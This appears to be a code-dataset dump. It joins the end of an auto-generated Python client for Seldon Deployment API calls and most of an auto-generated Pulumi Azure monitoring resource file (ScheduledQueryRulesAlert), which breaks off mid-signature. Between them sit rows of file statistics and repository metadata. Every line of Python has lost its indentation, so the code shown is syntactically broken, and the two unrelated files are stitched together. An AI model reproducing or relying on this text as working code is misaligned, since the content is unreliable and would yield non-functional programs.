path_params['namespace'] = params['namespace'] # noqa: E501
query_params = []
if 'action' in params:
query_params.append(('action', params['action'])) # noqa: E501
if 'message' in params:
query_params.append(('message', params['message'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'mldeployment' in params:
body_params = params['mldeployment']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['OAuth2'] # noqa: E501
return self.api_client.call_api(
'/namespaces/{namespace}/seldondeployments/{name}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SeldonDeployment', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def validate_seldon_deployment(self, namespace, mldeployment, **kwargs): # noqa: E501
"""validate_seldon_deployment # noqa: E501
Validate the given Seldon Deployment # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.validate_seldon_deployment(namespace, mldeployment, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str namespace: Namespace provides a logical grouping of resources (required)
:param SeldonDeployment mldeployment: Seldon Deployment (required)
:return: Message
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.validate_seldon_deployment_with_http_info(namespace, mldeployment, **kwargs) # noqa: E501
else:
(data) = self.validate_seldon_deployment_with_http_info(namespace, mldeployment, **kwargs) # noqa: E501
return data
def validate_seldon_deployment_with_http_info(self, namespace, mldeployment, **kwargs): # noqa: E501
"""validate_seldon_deployment # noqa: E501
Validate the given Seldon Deployment # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.validate_seldon_deployment_with_http_info(namespace, mldeployment, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str namespace: Namespace provides a logical grouping of resources (required)
:param SeldonDeployment mldeployment: Seldon Deployment (required)
:return: Message
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['namespace', 'mldeployment'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method validate_seldon_deployment" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'namespace' is set
if ('namespace' not in params or
params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `validate_seldon_deployment`") # noqa: E501
# verify the required parameter 'mldeployment' is set
if ('mldeployment' not in params or
params['mldeployment'] is None):
raise ValueError("Missing the required parameter `mldeployment` when calling `validate_seldon_deployment`") # noqa: E501
collection_formats = {}
path_params = {}
if 'namespace' in params:
path_params['namespace'] = params['namespace'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'mldeployment' in params:
body_params = params['mldeployment']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['OAuth2'] # noqa: E501
return self.api_client.call_api(
'/namespaces/{namespace}/seldondeployments/validate', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Message', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 42.226819 | 133 | 0.626736 | 3,243 | 29,601 | 5.504471 | 0.056121 | 0.050193 | 0.036973 | 0.044367 | 0.962187 | 0.960114 | 0.956585 | 0.947454 | 0.941124 | 0.940452 | 0 | 0.016539 | 0.285092 | 29,601 | 700 | 134 | 42.287143 | 0.827001 | 0.33786 | 0 | 0.808 | 0 | 0 | 0.214242 | 0.062158 | 0 | 0 | 0 | 0 | 0 | 1 | 0.034667 | false | 0 | 0.010667 | 0 | 0.096 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
008cc1ca7b077f8413c28e982d1be1f46cc194d4 | 41,485 | py | Python | sdk/python/pulumi_azure/monitoring/scheduled_query_rules_alert.py | henriktao/pulumi-azure | f1cbcf100b42b916da36d8fe28be3a159abaf022 | [
"ECL-2.0",
"Apache-2.0"
] | 109 | 2018-06-18T00:19:44.000Z | 2022-02-20T05:32:57.000Z | sdk/python/pulumi_azure/monitoring/scheduled_query_rules_alert.py | henriktao/pulumi-azure | f1cbcf100b42b916da36d8fe28be3a159abaf022 | [
"ECL-2.0",
"Apache-2.0"
] | 663 | 2018-06-18T21:08:46.000Z | 2022-03-31T20:10:11.000Z | sdk/python/pulumi_azure/monitoring/scheduled_query_rules_alert.py | henriktao/pulumi-azure | f1cbcf100b42b916da36d8fe28be3a159abaf022 | [
"ECL-2.0",
"Apache-2.0"
] | 41 | 2018-07-19T22:37:38.000Z | 2022-03-14T10:56:26.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['ScheduledQueryRulesAlertArgs', 'ScheduledQueryRulesAlert']
@pulumi.input_type
class ScheduledQueryRulesAlertArgs:
def __init__(__self__, *,
action: pulumi.Input['ScheduledQueryRulesAlertActionArgs'],
data_source_id: pulumi.Input[str],
frequency: pulumi.Input[int],
query: pulumi.Input[str],
resource_group_name: pulumi.Input[str],
time_window: pulumi.Input[int],
trigger: pulumi.Input['ScheduledQueryRulesAlertTriggerArgs'],
authorized_resource_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
auto_mitigation_enabled: Optional[pulumi.Input[bool]] = None,
description: Optional[pulumi.Input[str]] = None,
enabled: Optional[pulumi.Input[bool]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
query_type: Optional[pulumi.Input[str]] = None,
severity: Optional[pulumi.Input[int]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
throttling: Optional[pulumi.Input[int]] = None):
"""
The set of arguments for constructing a ScheduledQueryRulesAlert resource.
:param pulumi.Input['ScheduledQueryRulesAlertActionArgs'] action: An `action` block as defined below.
:param pulumi.Input[str] data_source_id: The resource URI over which log search query is to be run.
:param pulumi.Input[int] frequency: Frequency (in minutes) at which rule condition should be evaluated. Values must be between 5 and 1440 (inclusive).
:param pulumi.Input[str] query: Log search query.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which to create the scheduled query rule instance.
:param pulumi.Input[int] time_window: Time window for which data needs to be fetched for query (must be greater than or equal to `frequency`). Values must be between 5 and 2880 (inclusive).
:param pulumi.Input['ScheduledQueryRulesAlertTriggerArgs'] trigger: The condition that results in the alert rule being run.
:param pulumi.Input[Sequence[pulumi.Input[str]]] authorized_resource_ids: List of Resource IDs referred into query.
:param pulumi.Input[bool] auto_mitigation_enabled: Should the alerts in this Metric Alert be auto resolved? Defaults to `false`.
> **NOTE** `auto_mitigation_enabled` and `throttling` are mutually exclusive and cannot both be set.
:param pulumi.Input[str] description: The description of the scheduled query rule.
:param pulumi.Input[bool] enabled: Whether this scheduled query rule is enabled. Default is `true`.
:param pulumi.Input[str] name: The name of the scheduled query rule. Changing this forces a new resource to be created.
:param pulumi.Input[int] severity: Severity of the alert. Possible values include: 0, 1, 2, 3, or 4.
:param pulumi.Input[int] throttling: Time (in minutes) for which Alerts should be throttled or suppressed. Values must be between 0 and 10000 (inclusive).
"""
pulumi.set(__self__, "action", action)
pulumi.set(__self__, "data_source_id", data_source_id)
pulumi.set(__self__, "frequency", frequency)
pulumi.set(__self__, "query", query)
pulumi.set(__self__, "resource_group_name", resource_group_name)
pulumi.set(__self__, "time_window", time_window)
pulumi.set(__self__, "trigger", trigger)
if authorized_resource_ids is not None:
pulumi.set(__self__, "authorized_resource_ids", authorized_resource_ids)
if auto_mitigation_enabled is not None:
pulumi.set(__self__, "auto_mitigation_enabled", auto_mitigation_enabled)
if description is not None:
pulumi.set(__self__, "description", description)
if enabled is not None:
pulumi.set(__self__, "enabled", enabled)
if location is not None:
pulumi.set(__self__, "location", location)
if name is not None:
pulumi.set(__self__, "name", name)
if query_type is not None:
pulumi.set(__self__, "query_type", query_type)
if severity is not None:
pulumi.set(__self__, "severity", severity)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if throttling is not None:
pulumi.set(__self__, "throttling", throttling)
@property
@pulumi.getter
def action(self) -> pulumi.Input['ScheduledQueryRulesAlertActionArgs']:
"""
An `action` block as defined below.
"""
return pulumi.get(self, "action")
@action.setter
def action(self, value: pulumi.Input['ScheduledQueryRulesAlertActionArgs']):
pulumi.set(self, "action", value)
@property
@pulumi.getter(name="dataSourceId")
def data_source_id(self) -> pulumi.Input[str]:
"""
The resource URI over which log search query is to be run.
"""
return pulumi.get(self, "data_source_id")
@data_source_id.setter
def data_source_id(self, value: pulumi.Input[str]):
pulumi.set(self, "data_source_id", value)
@property
@pulumi.getter
def frequency(self) -> pulumi.Input[int]:
"""
Frequency (in minutes) at which rule condition should be evaluated. Values must be between 5 and 1440 (inclusive).
"""
return pulumi.get(self, "frequency")
@frequency.setter
def frequency(self, value: pulumi.Input[int]):
pulumi.set(self, "frequency", value)
@property
@pulumi.getter
def query(self) -> pulumi.Input[str]:
"""
Log search query.
"""
return pulumi.get(self, "query")
@query.setter
def query(self, value: pulumi.Input[str]):
pulumi.set(self, "query", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the resource group in which to create the scheduled query rule instance.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="timeWindow")
def time_window(self) -> pulumi.Input[int]:
"""
Time window for which data needs to be fetched for query (must be greater than or equal to `frequency`). Values must be between 5 and 2880 (inclusive).
"""
return pulumi.get(self, "time_window")
@time_window.setter
def time_window(self, value: pulumi.Input[int]):
pulumi.set(self, "time_window", value)
@property
@pulumi.getter
def trigger(self) -> pulumi.Input['ScheduledQueryRulesAlertTriggerArgs']:
"""
The condition that results in the alert rule being run.
"""
return pulumi.get(self, "trigger")
@trigger.setter
def trigger(self, value: pulumi.Input['ScheduledQueryRulesAlertTriggerArgs']):
pulumi.set(self, "trigger", value)
@property
@pulumi.getter(name="authorizedResourceIds")
def authorized_resource_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
List of Resource IDs referred into query.
"""
return pulumi.get(self, "authorized_resource_ids")
@authorized_resource_ids.setter
def authorized_resource_ids(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "authorized_resource_ids", value)
@property
@pulumi.getter(name="autoMitigationEnabled")
def auto_mitigation_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Should the alerts in this Metric Alert be auto resolved? Defaults to `false`.
> **NOTE** `auto_mitigation_enabled` and `throttling` are mutually exclusive and cannot both be set.
"""
return pulumi.get(self, "auto_mitigation_enabled")
@auto_mitigation_enabled.setter
def auto_mitigation_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "auto_mitigation_enabled", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
The description of the scheduled query rule.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Whether this scheduled query rule is enabled. Default is `true`.
"""
return pulumi.get(self, "enabled")
@enabled.setter
def enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enabled", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the scheduled query rule. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="queryType")
def query_type(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "query_type")
@query_type.setter
def query_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "query_type", value)
@property
@pulumi.getter
def severity(self) -> Optional[pulumi.Input[int]]:
"""
Severity of the alert. Possible values include: 0, 1, 2, 3, or 4.
"""
return pulumi.get(self, "severity")
@severity.setter
def severity(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "severity", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter
def throttling(self) -> Optional[pulumi.Input[int]]:
"""
Time (in minutes) for which Alerts should be throttled or suppressed. Values must be between 0 and 10000 (inclusive).
"""
return pulumi.get(self, "throttling")
@throttling.setter
def throttling(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "throttling", value)
@pulumi.input_type
class _ScheduledQueryRulesAlertState:
def __init__(__self__, *,
action: Optional[pulumi.Input['ScheduledQueryRulesAlertActionArgs']] = None,
authorized_resource_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
auto_mitigation_enabled: Optional[pulumi.Input[bool]] = None,
data_source_id: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
enabled: Optional[pulumi.Input[bool]] = None,
frequency: Optional[pulumi.Input[int]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
query: Optional[pulumi.Input[str]] = None,
query_type: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
severity: Optional[pulumi.Input[int]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
throttling: Optional[pulumi.Input[int]] = None,
time_window: Optional[pulumi.Input[int]] = None,
trigger: Optional[pulumi.Input['ScheduledQueryRulesAlertTriggerArgs']] = None):
"""
Input properties used for looking up and filtering ScheduledQueryRulesAlert resources.
:param pulumi.Input['ScheduledQueryRulesAlertActionArgs'] action: An `action` block as defined below.
:param pulumi.Input[Sequence[pulumi.Input[str]]] authorized_resource_ids: List of Resource IDs referred into query.
:param pulumi.Input[bool] auto_mitigation_enabled: Should the alerts in this Metric Alert be auto resolved? Defaults to `false`.
> **NOTE** `auto_mitigation_enabled` and `throttling` are mutually exclusive and cannot both be set.
:param pulumi.Input[str] data_source_id: The resource URI over which log search query is to be run.
:param pulumi.Input[str] description: The description of the scheduled query rule.
:param pulumi.Input[bool] enabled: Whether this scheduled query rule is enabled. Default is `true`.
:param pulumi.Input[int] frequency: Frequency (in minutes) at which rule condition should be evaluated. Values must be between 5 and 1440 (inclusive).
:param pulumi.Input[str] name: The name of the scheduled query rule. Changing this forces a new resource to be created.
:param pulumi.Input[str] query: Log search query.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which to create the scheduled query rule instance.
:param pulumi.Input[int] severity: Severity of the alert. Possible values include: 0, 1, 2, 3, or 4.
:param pulumi.Input[int] throttling: Time (in minutes) for which Alerts should be throttled or suppressed. Values must be between 0 and 10000 (inclusive).
:param pulumi.Input[int] time_window: Time window for which data needs to be fetched for query (must be greater than or equal to `frequency`). Values must be between 5 and 2880 (inclusive).
:param pulumi.Input['ScheduledQueryRulesAlertTriggerArgs'] trigger: The condition that results in the alert rule being run.
"""
if action is not None:
pulumi.set(__self__, "action", action)
if authorized_resource_ids is not None:
pulumi.set(__self__, "authorized_resource_ids", authorized_resource_ids)
if auto_mitigation_enabled is not None:
pulumi.set(__self__, "auto_mitigation_enabled", auto_mitigation_enabled)
if data_source_id is not None:
pulumi.set(__self__, "data_source_id", data_source_id)
if description is not None:
pulumi.set(__self__, "description", description)
if enabled is not None:
pulumi.set(__self__, "enabled", enabled)
if frequency is not None:
pulumi.set(__self__, "frequency", frequency)
if location is not None:
pulumi.set(__self__, "location", location)
if name is not None:
pulumi.set(__self__, "name", name)
if query is not None:
pulumi.set(__self__, "query", query)
if query_type is not None:
pulumi.set(__self__, "query_type", query_type)
if resource_group_name is not None:
pulumi.set(__self__, "resource_group_name", resource_group_name)
if severity is not None:
pulumi.set(__self__, "severity", severity)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if throttling is not None:
pulumi.set(__self__, "throttling", throttling)
if time_window is not None:
pulumi.set(__self__, "time_window", time_window)
if trigger is not None:
pulumi.set(__self__, "trigger", trigger)
@property
@pulumi.getter
def action(self) -> Optional[pulumi.Input['ScheduledQueryRulesAlertActionArgs']]:
"""
An `action` block as defined below.
"""
return pulumi.get(self, "action")
@action.setter
def action(self, value: Optional[pulumi.Input['ScheduledQueryRulesAlertActionArgs']]):
pulumi.set(self, "action", value)
@property
@pulumi.getter(name="authorizedResourceIds")
def authorized_resource_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
List of Resource IDs referred into query.
"""
return pulumi.get(self, "authorized_resource_ids")
@authorized_resource_ids.setter
def authorized_resource_ids(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "authorized_resource_ids", value)
@property
@pulumi.getter(name="autoMitigationEnabled")
def auto_mitigation_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Should the alerts in this Metric Alert be auto resolved? Defaults to `false`.
> **NOTE** `auto_mitigation_enabled` and `throttling` are mutually exclusive and cannot both be set.
"""
return pulumi.get(self, "auto_mitigation_enabled")
@auto_mitigation_enabled.setter
def auto_mitigation_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "auto_mitigation_enabled", value)
@property
@pulumi.getter(name="dataSourceId")
def data_source_id(self) -> Optional[pulumi.Input[str]]:
"""
The resource URI over which log search query is to be run.
"""
return pulumi.get(self, "data_source_id")
@data_source_id.setter
def data_source_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "data_source_id", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
The description of the scheduled query rule.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Whether this scheduled query rule is enabled. Default is `true`.
"""
return pulumi.get(self, "enabled")
@enabled.setter
def enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enabled", value)
@property
@pulumi.getter
def frequency(self) -> Optional[pulumi.Input[int]]:
"""
Frequency (in minutes) at which rule condition should be evaluated. Values must be between 5 and 1440 (inclusive).
"""
return pulumi.get(self, "frequency")
@frequency.setter
def frequency(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "frequency", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the scheduled query rule. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def query(self) -> Optional[pulumi.Input[str]]:
"""
Log search query.
"""
return pulumi.get(self, "query")
@query.setter
def query(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "query", value)
@property
@pulumi.getter(name="queryType")
def query_type(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "query_type")
@query_type.setter
def query_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "query_type", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the resource group in which to create the scheduled query rule instance.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter
def severity(self) -> Optional[pulumi.Input[int]]:
"""
Severity of the alert. Possible values include: 0, 1, 2, 3, or 4.
"""
return pulumi.get(self, "severity")
@severity.setter
def severity(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "severity", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter
def throttling(self) -> Optional[pulumi.Input[int]]:
"""
Time (in minutes) for which Alerts should be throttled or suppressed. Values must be between 0 and 10000 (inclusive).
"""
return pulumi.get(self, "throttling")
@throttling.setter
def throttling(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "throttling", value)
@property
@pulumi.getter(name="timeWindow")
def time_window(self) -> Optional[pulumi.Input[int]]:
"""
Time window for which data needs to be fetched for query (must be greater than or equal to `frequency`). Values must be between 5 and 2880 (inclusive).
"""
return pulumi.get(self, "time_window")
@time_window.setter
def time_window(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "time_window", value)
@property
@pulumi.getter
def trigger(self) -> Optional[pulumi.Input['ScheduledQueryRulesAlertTriggerArgs']]:
"""
The condition that results in the alert rule being run.
"""
return pulumi.get(self, "trigger")
@trigger.setter
def trigger(self, value: Optional[pulumi.Input['ScheduledQueryRulesAlertTriggerArgs']]):
pulumi.set(self, "trigger", value)
class ScheduledQueryRulesAlert(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
action: Optional[pulumi.Input[pulumi.InputType['ScheduledQueryRulesAlertActionArgs']]] = None,
authorized_resource_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
auto_mitigation_enabled: Optional[pulumi.Input[bool]] = None,
data_source_id: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
enabled: Optional[pulumi.Input[bool]] = None,
frequency: Optional[pulumi.Input[int]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
query: Optional[pulumi.Input[str]] = None,
query_type: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
severity: Optional[pulumi.Input[int]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
throttling: Optional[pulumi.Input[int]] = None,
time_window: Optional[pulumi.Input[int]] = None,
trigger: Optional[pulumi.Input[pulumi.InputType['ScheduledQueryRulesAlertTriggerArgs']]] = None,
__props__=None):
"""
Manages an AlertingAction Scheduled Query Rules resource within Azure Monitor.
## Import
Scheduled Query Rule Alerts can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:monitoring/scheduledQueryRulesAlert:ScheduledQueryRulesAlert example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.Insights/scheduledqueryrules/myrulename
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[pulumi.InputType['ScheduledQueryRulesAlertActionArgs']] action: An `action` block as defined below.
:param pulumi.Input[Sequence[pulumi.Input[str]]] authorized_resource_ids: List of Resource IDs referred into query.
:param pulumi.Input[bool] auto_mitigation_enabled: Should the alerts in this Metric Alert be auto resolved? Defaults to `false`.
> **NOTE** `auto_mitigation_enabled` and `throttling` are mutually exclusive and cannot both be set.
:param pulumi.Input[str] data_source_id: The resource URI over which log search query is to be run.
:param pulumi.Input[str] description: The description of the scheduled query rule.
:param pulumi.Input[bool] enabled: Whether this scheduled query rule is enabled. Default is `true`.
:param pulumi.Input[int] frequency: Frequency (in minutes) at which rule condition should be evaluated. Values must be between 5 and 1440 (inclusive).
:param pulumi.Input[str] name: The name of the scheduled query rule. Changing this forces a new resource to be created.
:param pulumi.Input[str] query: Log search query.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which to create the scheduled query rule instance.
:param pulumi.Input[int] severity: Severity of the alert. Possible values include: 0, 1, 2, 3, or 4.
:param pulumi.Input[int] throttling: Time (in minutes) for which Alerts should be throttled or suppressed. Values must be between 0 and 10000 (inclusive).
:param pulumi.Input[int] time_window: Time window for which data needs to be fetched for query (must be greater than or equal to `frequency`). Values must be between 5 and 2880 (inclusive).
:param pulumi.Input[pulumi.InputType['ScheduledQueryRulesAlertTriggerArgs']] trigger: The condition that results in the alert rule being run.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: ScheduledQueryRulesAlertArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages an AlertingAction Scheduled Query Rules resource within Azure Monitor.
## Import
Scheduled Query Rule Alerts can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:monitoring/scheduledQueryRulesAlert:ScheduledQueryRulesAlert example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.Insights/scheduledqueryrules/myrulename
```
:param str resource_name: The name of the resource.
:param ScheduledQueryRulesAlertArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ScheduledQueryRulesAlertArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
action: Optional[pulumi.Input[pulumi.InputType['ScheduledQueryRulesAlertActionArgs']]] = None,
authorized_resource_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
auto_mitigation_enabled: Optional[pulumi.Input[bool]] = None,
data_source_id: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
enabled: Optional[pulumi.Input[bool]] = None,
frequency: Optional[pulumi.Input[int]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
query: Optional[pulumi.Input[str]] = None,
query_type: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
severity: Optional[pulumi.Input[int]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
throttling: Optional[pulumi.Input[int]] = None,
time_window: Optional[pulumi.Input[int]] = None,
trigger: Optional[pulumi.Input[pulumi.InputType['ScheduledQueryRulesAlertTriggerArgs']]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = ScheduledQueryRulesAlertArgs.__new__(ScheduledQueryRulesAlertArgs)
if action is None and not opts.urn:
raise TypeError("Missing required property 'action'")
__props__.__dict__["action"] = action
__props__.__dict__["authorized_resource_ids"] = authorized_resource_ids
__props__.__dict__["auto_mitigation_enabled"] = auto_mitigation_enabled
if data_source_id is None and not opts.urn:
raise TypeError("Missing required property 'data_source_id'")
__props__.__dict__["data_source_id"] = data_source_id
__props__.__dict__["description"] = description
__props__.__dict__["enabled"] = enabled
if frequency is None and not opts.urn:
raise TypeError("Missing required property 'frequency'")
__props__.__dict__["frequency"] = frequency
__props__.__dict__["location"] = location
__props__.__dict__["name"] = name
if query is None and not opts.urn:
raise TypeError("Missing required property 'query'")
__props__.__dict__["query"] = query
__props__.__dict__["query_type"] = query_type
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["severity"] = severity
__props__.__dict__["tags"] = tags
__props__.__dict__["throttling"] = throttling
if time_window is None and not opts.urn:
raise TypeError("Missing required property 'time_window'")
__props__.__dict__["time_window"] = time_window
if trigger is None and not opts.urn:
raise TypeError("Missing required property 'trigger'")
__props__.__dict__["trigger"] = trigger
super(ScheduledQueryRulesAlert, __self__).__init__(
'azure:monitoring/scheduledQueryRulesAlert:ScheduledQueryRulesAlert',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
action: Optional[pulumi.Input[pulumi.InputType['ScheduledQueryRulesAlertActionArgs']]] = None,
authorized_resource_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
auto_mitigation_enabled: Optional[pulumi.Input[bool]] = None,
data_source_id: Optional[pulumi.Input[str]] = None,
